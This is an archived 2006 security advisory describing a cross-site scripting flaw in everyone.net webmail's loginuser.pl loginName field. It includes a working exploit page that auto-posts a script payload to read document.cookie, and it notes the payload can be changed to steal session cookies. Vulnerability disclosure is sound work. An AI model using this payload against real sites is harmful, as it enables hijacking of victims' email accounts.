what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

EveryoneXSS.txt

EveryoneXSS.txt
Posted Feb 14, 2006
Authored by Simo64 | Site morx.org

everyone.net suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | faa21458375340fb658623afc01ab5f9d714d590ae8de211b90a17527e637322

EveryoneXSS.txt

Change Mirror Download
Title: Everyone's loginName variable Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Published: 12 february 2006
MorX Security Research Team
http://www.morx.org
Service: Webmail
Vendor: everyone / www.everyone.net
Vulnerability: Cross Site Scripting
Exploit included: Yes

Details:

Everyone.net is an email service provider, offering new email accounts for
personal email, group email, business email and outsourced email.
eveyone.net offers secure email hosting with email accounts that are fast
and reliable and provides full-featured email services for over 300,000
domains. their solutions include a range of features including Web Mail,
SpamShield Pro, Anti-Virus, IMAP, POP, SMTP and free domain registrations.
for more information visit their website at http://www.everyone.net

everyone's login perl script (loginuser.pl) is prone to cross-site
scripting attacks. This problem is due to a failure in the script to
properly sanitize user-supplied input when passed in variable loginName.

from loginuser.htm source code after submiting ">maliciousCode as a username:

<td align="right"><input type="text" name="loginName" size="15"
value="">maliciousCode" maxlength="100"></td></tr>

Impact:

an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified everyone user in the
context of the vulnerable website. resulting in the theft of cookie-based
authentication giving the attacker full access to the victim's email
account as well as other type of attacks.


Affected script URL path:

www.vulnerable-site.com/email/scripts/loginuser.pl

Exploit:

i ve read in a paper that cross site scripting that requires using the
POST method instead of GET is not exploitable, that's false since POSTing
a form doesnt necessary requires using <input type ="submit" instead of
that we can use a javascript attribute to have the data automatically
posted.

everyone's exploit form:

<html>

<body onload="document.xploitform.submit(); ">

<form name="xploitform" method="post"
action="http://vulnerable-site/email/scripts/loginuser.pl">

<input type="hidden" name="loginName"
value='"><script>alert(document.cookie)</script>'>

<input type="hidden" name="user_pwd" value='anypassword'>

</form></body>

</html>

the above code can be placed on a web page by an attacker and have a
victim visit the page. the login name value can be changed to have the
cookie redirected and grabbed by the attacker

Screen capture:

http://www.morx.org/everyoneXSS.JPG

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    2 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close